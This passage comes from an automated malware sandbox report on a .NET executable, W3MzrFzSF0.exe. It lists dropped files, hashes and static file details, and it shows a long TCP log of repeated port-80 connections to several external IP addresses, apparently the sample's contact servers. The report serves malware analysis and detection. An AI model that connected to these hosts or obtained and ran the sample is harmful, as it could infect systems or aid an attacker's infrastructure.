                                                                                  Process:C:\Windows\SysWOW64\pcaui.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.121297215059106
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                  MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                  SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                  SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                  SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5znszgej.tb0.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h3nwht0z.oos.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rgmfjlij.vsl.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rvq2bxzk.4vf.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  Static File Info

                                                                                  General

                                                                                  File type:
                                                                                  Entropy (8bit):7.721271044960644
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                  • Windows Screen Saver (13104/52) 0.07%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                  File name:W3MzrFzSF0.exe
                                                                                  File size:795'136 bytes
                                                                                  MD5:44ae4c9c2ab6623c0c1d04bb8b81871e
                                                                                  SHA1:efdd834862890028d1b52e2076ff5f78c84754c5
                                                                                  SHA256:122baa2b0520a7dd37025a89bccf9fcaf87f99519bfc0ec84a4a48cddb6f9b6d
                                                                                  SHA512:13c156d9ad7156b918207848a79e1419e96c53a65c0aab04f6aa572395c5a148805d9e90439e9b4095667361467560cd23e0f875950433003cbc7aba23f8700e
                                                                                  SSDEEP:12288:lnCb+eCSmxbeTHBVQAZQ+rX61yukWpGxFO9IbJoQ5GfHZPXjK/9I3j/VzrRZPCoT:luCUVn9X6HhuJoQ5QZPXu9Iz/VHRZKo
                                                                                  TLSH:A305F1403756C702E5864BB00861E3B427B92E9EF521C31B8BF9ADFF7835719A199387
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$sEg..............0..............5... ...@....@.. ....................................@................................

                                                                                  File Icon

                                                                                  Icon Hash:00928e8e8686b000

                                                                                  Network Behavior

                                                                                  Network Port Distribution

                                                                                  TCP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Nov 27, 2024 01:25:20.939548016 CET4973580192.168.2.5103.21.221.87
                                                                                  Nov 27, 2024 01:25:21.059626102 CET8049735103.21.221.87192.168.2.5
                                                                                  Nov 27, 2024 01:25:21.059742928 CET4973580192.168.2.5103.21.221.87
                                                                                  Nov 27, 2024 01:25:21.069041014 CET4973580192.168.2.5103.21.221.87
                                                                                  Nov 27, 2024 01:25:21.189011097 CET8049735103.21.221.87192.168.2.5
                                                                                  Nov 27, 2024 01:25:22.703896999 CET8049735103.21.221.87192.168.2.5
                                                                                  Nov 27, 2024 01:25:22.704083920 CET8049735103.21.221.87192.168.2.5
                                                                                  Nov 27, 2024 01:25:22.704159021 CET4973580192.168.2.5103.21.221.87
                                                                                  Nov 27, 2024 01:25:22.707463980 CET4973580192.168.2.5103.21.221.87
                                                                                  Nov 27, 2024 01:25:22.827322960 CET8049735103.21.221.87192.168.2.5
                                                                                  Nov 27, 2024 01:25:38.479645014 CET4977080192.168.2.538.47.232.124
                                                                                  Nov 27, 2024 01:25:38.599657059 CET804977038.47.232.124192.168.2.5
                                                                                  Nov 27, 2024 01:25:38.600908995 CET4977080192.168.2.538.47.232.124
                                                                                  Nov 27, 2024 01:25:38.756294966 CET4977080192.168.2.538.47.232.124
                                                                                  Nov 27, 2024 01:25:38.876353025 CET804977038.47.232.124192.168.2.5
                                                                                  Nov 27, 2024 01:25:40.236278057 CET804977038.47.232.124192.168.2.5
                                                                                  Nov 27, 2024 01:25:40.236407042 CET804977038.47.232.124192.168.2.5
                                                                                  Nov 27, 2024 01:25:40.236479044 CET4977080192.168.2.538.47.232.124
                                                                                  Nov 27, 2024 01:25:40.270967007 CET4977080192.168.2.538.47.232.124
                                                                                  Nov 27, 2024 01:25:41.298779964 CET4977480192.168.2.538.47.232.124
                                                                                  Nov 27, 2024 01:25:41.418834925 CET804977438.47.232.124192.168.2.5
                                                                                  Nov 27, 2024 01:25:41.418941975 CET4977480192.168.2.538.47.232.124
                                                                                  Nov 27, 2024 01:25:41.435967922 CET4977480192.168.2.538.47.232.124
                                                                                  Nov 27, 2024 01:25:41.555939913 CET804977438.47.232.124192.168.2.5
                                                                                  Nov 27, 2024 01:25:42.941221952 CET4977480192.168.2.538.47.232.124
                                                                                  Nov 27, 2024 01:25:43.001934052 CET804977438.47.232.124192.168.2.5
                                                                                  Nov 27, 2024 01:25:43.001990080 CET804977438.47.232.124192.168.2.5
                                                                                  Nov 27, 2024 01:25:43.002286911 CET4977480192.168.2.538.47.232.124
                                                                                  Nov 27, 2024 01:25:43.002286911 CET4977480192.168.2.538.47.232.124
                                                                                  Nov 27, 2024 01:25:43.061362028 CET804977438.47.232.124192.168.2.5
                                                                                  Nov 27, 2024 01:25:43.063817978 CET4977480192.168.2.538.47.232.124
                                                                                  Nov 27, 2024 01:25:43.959692001 CET4978080192.168.2.538.47.232.124
                                                                                  Nov 27, 2024 01:25:44.079988956 CET804978038.47.232.124192.168.2.5
                                                                                  Nov 27, 2024 01:25:44.080092907 CET4978080192.168.2.538.47.232.124
                                                                                  Nov 27, 2024 01:25:44.092979908 CET4978080192.168.2.538.47.232.124
                                                                                  Nov 27, 2024 01:25:44.213047981 CET804978038.47.232.124192.168.2.5
                                                                                  Nov 27, 2024 01:25:44.213071108 CET804978038.47.232.124192.168.2.5
                                                                                  Nov 27, 2024 01:25:45.597475052 CET4978080192.168.2.538.47.232.124
                                                                                  Nov 27, 2024 01:25:45.679646015 CET804978038.47.232.124192.168.2.5
                                                                                  Nov 27, 2024 01:25:45.679766893 CET804978038.47.232.124192.168.2.5
                                                                                  Nov 27, 2024 01:25:45.679929018 CET4978080192.168.2.538.47.232.124
                                                                                  Nov 27, 2024 01:25:45.679929018 CET4978080192.168.2.538.47.232.124
                                                                                  Nov 27, 2024 01:25:45.717463970 CET804978038.47.232.124192.168.2.5
                                                                                  Nov 27, 2024 01:25:45.717546940 CET4978080192.168.2.538.47.232.124
                                                                                  Nov 27, 2024 01:25:46.616375923 CET4978580192.168.2.538.47.232.124
                                                                                  Nov 27, 2024 01:25:46.736327887 CET804978538.47.232.124192.168.2.5
                                                                                  Nov 27, 2024 01:25:46.736460924 CET4978580192.168.2.538.47.232.124
                                                                                  Nov 27, 2024 01:25:46.749102116 CET4978580192.168.2.538.47.232.124
                                                                                  Nov 27, 2024 01:25:46.869111061 CET804978538.47.232.124192.168.2.5
                                                                                  Nov 27, 2024 01:25:48.315025091 CET804978538.47.232.124192.168.2.5
                                                                                  Nov 27, 2024 01:25:48.315201044 CET804978538.47.232.124192.168.2.5
                                                                                  Nov 27, 2024 01:25:48.315530062 CET4978580192.168.2.538.47.232.124
                                                                                  Nov 27, 2024 01:25:48.318057060 CET4978580192.168.2.538.47.232.124
                                                                                  Nov 27, 2024 01:25:48.438229084 CET804978538.47.232.124192.168.2.5
                                                                                  Nov 27, 2024 01:25:53.782776117 CET4980280192.168.2.5199.59.243.227
                                                                                  Nov 27, 2024 01:25:53.902869940 CET8049802199.59.243.227192.168.2.5
                                                                                  Nov 27, 2024 01:25:53.903733015 CET4980280192.168.2.5199.59.243.227
                                                                                  Nov 27, 2024 01:25:53.915714979 CET4980280192.168.2.5199.59.243.227
                                                                                  Nov 27, 2024 01:25:54.035795927 CET8049802199.59.243.227192.168.2.5
                                                                                  Nov 27, 2024 01:25:55.001492977 CET8049802199.59.243.227192.168.2.5
                                                                                  Nov 27, 2024 01:25:55.001558065 CET8049802199.59.243.227192.168.2.5
                                                                                  Nov 27, 2024 01:25:55.001566887 CET8049802199.59.243.227192.168.2.5
                                                                                  Nov 27, 2024 01:25:55.001648903 CET4980280192.168.2.5199.59.243.227
                                                                                  Nov 27, 2024 01:25:55.426737070 CET4980280192.168.2.5199.59.243.227
                                                                                  Nov 27, 2024 01:25:56.444072008 CET4980880192.168.2.5199.59.243.227
                                                                                  Nov 27, 2024 01:25:56.564311981 CET8049808199.59.243.227192.168.2.5
                                                                                  Nov 27, 2024 01:25:56.564452887 CET4980880192.168.2.5199.59.243.227
                                                                                  Nov 27, 2024 01:25:56.578525066 CET4980880192.168.2.5199.59.243.227
                                                                                  Nov 27, 2024 01:25:56.698869944 CET8049808199.59.243.227192.168.2.5
                                                                                  Nov 27, 2024 01:25:57.706832886 CET8049808199.59.243.227192.168.2.5
                                                                                  Nov 27, 2024 01:25:57.706887007 CET8049808199.59.243.227192.168.2.5
                                                                                  Nov 27, 2024 01:25:57.706896067 CET8049808199.59.243.227192.168.2.5
                                                                                  Nov 27, 2024 01:25:57.706949949 CET4980880192.168.2.5199.59.243.227
                                                                                  Nov 27, 2024 01:25:58.081968069 CET4980880192.168.2.5199.59.243.227
                                                                                  Nov 27, 2024 01:25:59.100223064 CET4981580192.168.2.5199.59.243.227
                                                                                  Nov 27, 2024 01:25:59.220187902 CET8049815199.59.243.227192.168.2.5
                                                                                  Nov 27, 2024 01:25:59.220269918 CET4981580192.168.2.5199.59.243.227
                                                                                  Nov 27, 2024 01:25:59.233505011 CET4981580192.168.2.5199.59.243.227
                                                                                  Nov 27, 2024 01:25:59.353601933 CET8049815199.59.243.227192.168.2.5
                                                                                  Nov 27, 2024 01:25:59.353648901 CET8049815199.59.243.227192.168.2.5
                                                                                  Nov 27, 2024 01:26:00.363328934 CET8049815199.59.243.227192.168.2.5
                                                                                  Nov 27, 2024 01:26:00.363392115 CET8049815199.59.243.227192.168.2.5
                                                                                  Nov 27, 2024 01:26:00.363439083 CET4981580192.168.2.5199.59.243.227
                                                                                  Nov 27, 2024 01:26:00.363471985 CET8049815199.59.243.227192.168.2.5
                                                                                  Nov 27, 2024 01:26:00.363518000 CET4981580192.168.2.5199.59.243.227
                                                                                  Nov 27, 2024 01:26:00.738229036 CET4981580192.168.2.5199.59.243.227
                                                                                  Nov 27, 2024 01:26:01.756362915 CET4982180192.168.2.5199.59.243.227
                                                                                  Nov 27, 2024 01:26:01.876303911 CET8049821199.59.243.227192.168.2.5
                                                                                  Nov 27, 2024 01:26:01.876395941 CET4982180192.168.2.5199.59.243.227
                                                                                  Nov 27, 2024 01:26:01.884886026 CET4982180192.168.2.5199.59.243.227
                                                                                  Nov 27, 2024 01:26:02.004818916 CET8049821199.59.243.227192.168.2.5
                                                                                  Nov 27, 2024 01:26:02.972707987 CET8049821199.59.243.227192.168.2.5
                                                                                  Nov 27, 2024 01:26:02.972793102 CET8049821199.59.243.227192.168.2.5
                                                                                  Nov 27, 2024 01:26:02.972803116 CET8049821199.59.243.227192.168.2.5
                                                                                  Nov 27, 2024 01:26:02.972889900 CET4982180192.168.2.5199.59.243.227
                                                                                  Nov 27, 2024 01:26:02.978602886 CET4982180192.168.2.5199.59.243.227
                                                                                  Nov 27, 2024 01:26:03.098493099 CET8049821199.59.243.227192.168.2.5
                                                                                  Nov 27, 2024 01:26:09.255233049 CET4983980192.168.2.5146.88.233.115
                                                                                  Nov 27, 2024 01:26:09.375328064 CET8049839146.88.233.115192.168.2.5
                                                                                  Nov 27, 2024 01:26:09.375907898 CET4983980192.168.2.5146.88.233.115
                                                                                  Nov 27, 2024 01:26:09.389535904 CET4983980192.168.2.5146.88.233.115
                                                                                  Nov 27, 2024 01:26:09.509583950 CET8049839146.88.233.115192.168.2.5
                                                                                  Nov 27, 2024 01:26:10.894644976 CET4983980192.168.2.5146.88.233.115
                                                                                  Nov 27, 2024 01:26:10.930433035 CET8049839146.88.233.115192.168.2.5
                                                                                  Nov 27, 2024 01:26:10.930496931 CET8049839146.88.233.115192.168.2.5
                                                                                  Nov 27, 2024 01:26:10.930516005 CET4983980192.168.2.5146.88.233.115
                                                                                  Nov 27, 2024 01:26:10.930674076 CET4983980192.168.2.5146.88.233.115
                                                                                  Nov 27, 2024 01:26:11.014666080 CET8049839146.88.233.115192.168.2.5
                                                                                  Nov 27, 2024 01:26:11.014729977 CET4983980192.168.2.5146.88.233.115
                                                                                  Nov 27, 2024 01:26:11.912923098 CET4984580192.168.2.5146.88.233.115
                                                                                  Nov 27, 2024 01:26:12.032984972 CET8049845146.88.233.115192.168.2.5
                                                                                  Nov 27, 2024 01:26:12.033133984 CET4984580192.168.2.5146.88.233.115
                                                                                  Nov 27, 2024 01:26:12.047336102 CET4984580192.168.2.5146.88.233.115
                                                                                  Nov 27, 2024 01:26:12.167372942 CET8049845146.88.233.115192.168.2.5
                                                                                  Nov 27, 2024 01:26:13.309948921 CET8049845146.88.233.115192.168.2.5
                                                                                  Nov 27, 2024 01:26:13.310864925 CET8049845146.88.233.115192.168.2.5
                                                                                  Nov 27, 2024 01:26:13.310930014 CET4984580192.168.2.5146.88.233.115
                                                                                  Nov 27, 2024 01:26:13.550761938 CET4984580192.168.2.5146.88.233.115
                                                                                  Nov 27, 2024 01:26:14.569317102 CET4985180192.168.2.5146.88.233.115
                                                                                  Nov 27, 2024 01:26:14.689273119 CET8049851146.88.233.115192.168.2.5
                                                                                  Nov 27, 2024 01:26:14.691837072 CET4985180192.168.2.5146.88.233.115
                                                                                  Nov 27, 2024 01:26:14.705929041 CET4985180192.168.2.5146.88.233.115
                                                                                  Nov 27, 2024 01:26:14.825911999 CET8049851146.88.233.115192.168.2.5
                                                                                  Nov 27, 2024 01:26:14.826018095 CET8049851146.88.233.115192.168.2.5
                                                                                  Nov 27, 2024 01:26:16.123919964 CET8049851146.88.233.115192.168.2.5
                                                                                  Nov 27, 2024 01:26:16.124003887 CET8049851146.88.233.115192.168.2.5
                                                                                  Nov 27, 2024 01:26:16.124069929 CET4985180192.168.2.5146.88.233.115
                                                                                  Nov 27, 2024 01:26:16.207202911 CET4985180192.168.2.5146.88.233.115
                                                                                  Nov 27, 2024 01:26:17.230513096 CET4985780192.168.2.5146.88.233.115
                                                                                  Nov 27, 2024 01:26:17.350461006 CET8049857146.88.233.115192.168.2.5
                                                                                  Nov 27, 2024 01:26:17.350560904 CET4985780192.168.2.5146.88.233.115
                                                                                  Nov 27, 2024 01:26:17.359808922 CET4985780192.168.2.5146.88.233.115
                                                                                  Nov 27, 2024 01:26:17.479765892 CET8049857146.88.233.115192.168.2.5
                                                                                  Nov 27, 2024 01:26:18.682638884 CET8049857146.88.233.115192.168.2.5
                                                                                  Nov 27, 2024 01:26:18.682771921 CET8049857146.88.233.115192.168.2.5
                                                                                  Nov 27, 2024 01:26:18.683806896 CET4985780192.168.2.5146.88.233.115
                                                                                  Nov 27, 2024 01:26:18.685688972 CET4985780192.168.2.5146.88.233.115
                                                                                  Nov 27, 2024 01:26:18.805547953 CET8049857146.88.233.115192.168.2.5
                                                                                  Nov 27, 2024 01:26:24.469753981 CET4987580192.168.2.5109.70.26.37
                                                                                  Nov 27, 2024 01:26:24.589740992 CET8049875109.70.26.37192.168.2.5
                                                                                  Nov 27, 2024 01:26:24.597870111 CET4987580192.168.2.5109.70.26.37
                                                                                  Nov 27, 2024 01:26:24.609863043 CET4987580192.168.2.5109.70.26.37
                                                                                  Nov 27, 2024 01:26:24.729846001 CET8049875109.70.26.37192.168.2.5
                                                                                  Nov 27, 2024 01:26:26.113292933 CET4987580192.168.2.5109.70.26.37
                                                                                  Nov 27, 2024 01:26:26.274781942 CET8049875109.70.26.37192.168.2.5
                                                                                  Nov 27, 2024 01:26:27.131814957 CET4988180192.168.2.5109.70.26.37
                                                                                  Nov 27, 2024 01:26:27.251785040 CET8049881109.70.26.37192.168.2.5
                                                                                  Nov 27, 2024 01:26:27.253911018 CET4988180192.168.2.5109.70.26.37
                                                                                  Nov 27, 2024 01:26:27.267924070 CET4988180192.168.2.5109.70.26.37
                                                                                  Nov 27, 2024 01:26:27.391027927 CET8049881109.70.26.37192.168.2.5
                                                                                  Nov 27, 2024 01:26:28.769471884 CET4988180192.168.2.5109.70.26.37
                                                                                  Nov 27, 2024 01:26:28.934825897 CET8049881109.70.26.37192.168.2.5
                                                                                  Nov 27, 2024 01:26:29.788314104 CET4988880192.168.2.5109.70.26.37
                                                                                  Nov 27, 2024 01:26:29.908318996 CET8049888109.70.26.37192.168.2.5
                                                                                  Nov 27, 2024 01:26:29.908416986 CET4988880192.168.2.5109.70.26.37
                                                                                  Nov 27, 2024 01:26:29.924362898 CET4988880192.168.2.5109.70.26.37
                                                                                  Nov 27, 2024 01:26:30.044274092 CET8049888109.70.26.37192.168.2.5
                                                                                  Nov 27, 2024 01:26:30.044378996 CET8049888109.70.26.37192.168.2.5
                                                                                  Nov 27, 2024 01:26:31.441560984 CET4988880192.168.2.5109.70.26.37
                                                                                  Nov 27, 2024 01:26:31.606750965 CET8049888109.70.26.37192.168.2.5
                                                                                  Nov 27, 2024 01:26:32.473401070 CET4989580192.168.2.5109.70.26.37
                                                                                  Nov 27, 2024 01:26:32.593539000 CET8049895109.70.26.37192.168.2.5
                                                                                  Nov 27, 2024 01:26:32.593905926 CET4989580192.168.2.5109.70.26.37
                                                                                  Nov 27, 2024 01:26:32.605792046 CET4989580192.168.2.5109.70.26.37
                                                                                  Nov 27, 2024 01:26:32.725929976 CET8049895109.70.26.37192.168.2.5
                                                                                  Nov 27, 2024 01:26:46.558326006 CET8049875109.70.26.37192.168.2.5
                                                                                  Nov 27, 2024 01:26:46.561954975 CET4987580192.168.2.5109.70.26.37
                                                                                  Nov 27, 2024 01:26:49.184237957 CET8049881109.70.26.37192.168.2.5
                                                                                  Nov 27, 2024 01:26:49.184596062 CET4988180192.168.2.5109.70.26.37
                                                                                  Nov 27, 2024 01:26:51.974158049 CET8049888109.70.26.37192.168.2.5
                                                                                  Nov 27, 2024 01:26:51.974221945 CET4988880192.168.2.5109.70.26.37
                                                                                  Nov 27, 2024 01:26:54.574369907 CET8049895109.70.26.37192.168.2.5
                                                                                  Nov 27, 2024 01:26:54.574486017 CET4989580192.168.2.5109.70.26.37
                                                                                  Nov 27, 2024 01:26:54.577888012 CET4989580192.168.2.5109.70.26.37
                                                                                  Nov 27, 2024 01:26:54.697978020 CET8049895109.70.26.37192.168.2.5
                                                                                  Nov 27, 2024 01:27:00.703170061 CET4995880192.168.2.547.76.213.197
                                                                                  Nov 27, 2024 01:27:00.823086977 CET804995847.76.213.197192.168.2.5
                                                                                  Nov 27, 2024 01:27:00.825979948 CET4995880192.168.2.547.76.213.197
                                                                                  Nov 27, 2024 01:27:00.840353966 CET4995880192.168.2.547.76.213.197
                                                                                  Nov 27, 2024 01:27:00.960334063 CET804995847.76.213.197192.168.2.5
                                                                                  Nov 27, 2024 01:27:02.347738028 CET4995880192.168.2.547.76.213.197
                                                                                  Nov 27, 2024 01:27:02.412770033 CET804995847.76.213.197192.168.2.5
                                                                                  Nov 27, 2024 01:27:02.412846088 CET804995847.76.213.197192.168.2.5
                                                                                  Nov 27, 2024 01:27:02.412874937 CET4995880192.168.2.547.76.213.197
                                                                                  Nov 27, 2024 01:27:02.412914991 CET4995880192.168.2.547.76.213.197
                                                                                  Nov 27, 2024 01:27:02.467715025 CET804995847.76.213.197192.168.2.5
                                                                                  Nov 27, 2024 01:27:02.467788935 CET4995880192.168.2.547.76.213.197
                                                                                  Nov 27, 2024 01:27:03.864310980 CET4996480192.168.2.547.76.213.197
                                                                                  Nov 27, 2024 01:27:03.984359026 CET804996447.76.213.197192.168.2.5
                                                                                  Nov 27, 2024 01:27:03.984422922 CET4996480192.168.2.547.76.213.197
                                                                                  Nov 27, 2024 01:27:04.005177975 CET4996480192.168.2.547.76.213.197
                                                                                  Nov 27, 2024 01:27:04.125125885 CET804996447.76.213.197192.168.2.5
                                                                                  Nov 27, 2024 01:27:05.519608974 CET4996480192.168.2.547.76.213.197
                                                                                  Nov 27, 2024 01:27:05.521507025 CET804996447.76.213.197192.168.2.5
                                                                                  Nov 27, 2024 01:27:05.521594048 CET804996447.76.213.197192.168.2.5
                                                                                  Nov 27, 2024 01:27:05.521684885 CET4996480192.168.2.547.76.213.197
                                                                                  Nov 27, 2024 01:27:05.521899939 CET4996480192.168.2.547.76.213.197
                                                                                  Nov 27, 2024 01:27:05.639554024 CET804996447.76.213.197192.168.2.5
                                                                                  Nov 27, 2024 01:27:05.639622927 CET4996480192.168.2.547.76.213.197
                                                                                  Nov 27, 2024 01:27:06.538031101 CET4997380192.168.2.547.76.213.197
                                                                                  Nov 27, 2024 01:27:06.657855034 CET804997347.76.213.197192.168.2.5
                                                                                  Nov 27, 2024 01:27:06.663065910 CET4997380192.168.2.547.76.213.197
                                                                                  Nov 27, 2024 01:27:06.679953098 CET4997380192.168.2.547.76.213.197
                                                                                  Nov 27, 2024 01:27:06.799869061 CET804997347.76.213.197192.168.2.5
                                                                                  Nov 27, 2024 01:27:06.799995899 CET804997347.76.213.197192.168.2.5
                                                                                  Nov 27, 2024 01:27:08.191807985 CET4997380192.168.2.547.76.213.197
                                                                                  Nov 27, 2024 01:27:08.312108994 CET804997347.76.213.197192.168.2.5
                                                                                  Nov 27, 2024 01:27:08.312176943 CET4997380192.168.2.547.76.213.197
                                                                                  Nov 27, 2024 01:27:09.212352037 CET4998080192.168.2.547.76.213.197
                                                                                  Nov 27, 2024 01:27:09.332324028 CET804998047.76.213.197192.168.2.5
                                                                                  Nov 27, 2024 01:27:09.336107969 CET4998080192.168.2.547.76.213.197
                                                                                  Nov 27, 2024 01:27:09.344810963 CET4998080192.168.2.547.76.213.197
                                                                                  Nov 27, 2024 01:27:09.464884996 CET804998047.76.213.197192.168.2.5
                                                                                  Nov 27, 2024 01:27:10.929296017 CET804998047.76.213.197192.168.2.5
                                                                                  Nov 27, 2024 01:27:10.929505110 CET804998047.76.213.197192.168.2.5
                                                                                  Nov 27, 2024 01:27:10.929630041 CET4998080192.168.2.547.76.213.197
                                                                                  Nov 27, 2024 01:27:10.932378054 CET4998080192.168.2.547.76.213.197
                                                                                  Nov 27, 2024 01:27:11.052242041 CET804998047.76.213.197192.168.2.5
                                                                                  Nov 27, 2024 01:27:16.648510933 CET4999280192.168.2.5208.91.197.27
                                                                                  Nov 27, 2024 01:27:16.768404961 CET8049992208.91.197.27192.168.2.5
                                                                                  Nov 27, 2024 01:27:16.768583059 CET4999280192.168.2.5208.91.197.27
                                                                                  Nov 27, 2024 01:27:16.783996105 CET4999280192.168.2.5208.91.197.27
                                                                                  Nov 27, 2024 01:27:16.904088974 CET8049992208.91.197.27192.168.2.5
                                                                                  Nov 27, 2024 01:27:17.973313093 CET8049992208.91.197.27192.168.2.5
                                                                                  Nov 27, 2024 01:27:17.973402023 CET4999280192.168.2.5208.91.197.27
                                                                                  Nov 27, 2024 01:27:18.285254002 CET4999280192.168.2.5208.91.197.27
                                                                                  Nov 27, 2024 01:27:18.405081034 CET8049992208.91.197.27192.168.2.5
                                                                                  Nov 27, 2024 01:27:19.304115057 CET4999880192.168.2.5208.91.197.27
                                                                                  Nov 27, 2024 01:27:19.424067974 CET8049998208.91.197.27192.168.2.5
                                                                                  Nov 27, 2024 01:27:19.424201012 CET4999880192.168.2.5208.91.197.27
                                                                                  Nov 27, 2024 01:27:19.440047979 CET4999880192.168.2.5208.91.197.27
                                                                                  Nov 27, 2024 01:27:19.559919119 CET8049998208.91.197.27192.168.2.5
                                                                                  Nov 27, 2024 01:27:20.712877035 CET8049998208.91.197.27192.168.2.5
                                                                                  Nov 27, 2024 01:27:20.720097065 CET4999880192.168.2.5208.91.197.27
                                                                                  Nov 27, 2024 01:27:20.949398041 CET4999880192.168.2.5208.91.197.27
                                                                                  Nov 27, 2024 01:27:21.069293022 CET8049998208.91.197.27192.168.2.5
                                                                                  Nov 27, 2024 01:27:21.965245008 CET5000480192.168.2.5208.91.197.27
                                                                                  Nov 27, 2024 01:27:22.086236954 CET8050004208.91.197.27192.168.2.5
                                                                                  Nov 27, 2024 01:27:22.086323023 CET5000480192.168.2.5208.91.197.27
                                                                                  Nov 27, 2024 01:27:22.100759029 CET5000480192.168.2.5208.91.197.27
                                                                                  Nov 27, 2024 01:27:22.220829010 CET8050004208.91.197.27192.168.2.5
                                                                                  Nov 27, 2024 01:27:22.220849991 CET8050004208.91.197.27192.168.2.5
                                                                                  Nov 27, 2024 01:27:23.292267084 CET8050004208.91.197.27192.168.2.5
                                                                                  Nov 27, 2024 01:27:23.296468019 CET5000480192.168.2.5208.91.197.27
                                                                                  Nov 27, 2024 01:27:23.613470078 CET5000480192.168.2.5208.91.197.27
                                                                                  Nov 27, 2024 01:27:23.733352900 CET8050004208.91.197.27192.168.2.5
                                                                                  Nov 27, 2024 01:27:24.632114887 CET5000580192.168.2.5208.91.197.27
                                                                                  Nov 27, 2024 01:27:24.752053022 CET8050005208.91.197.27192.168.2.5
                                                                                  Nov 27, 2024 01:27:24.752229929 CET5000580192.168.2.5208.91.197.27
                                                                                  Nov 27, 2024 01:27:24.764094114 CET5000580192.168.2.5208.91.197.27
                                                                                  Nov 27, 2024 01:27:24.884030104 CET8050005208.91.197.27192.168.2.5
                                                                                  Nov 27, 2024 01:27:26.225665092 CET8050005208.91.197.27192.168.2.5
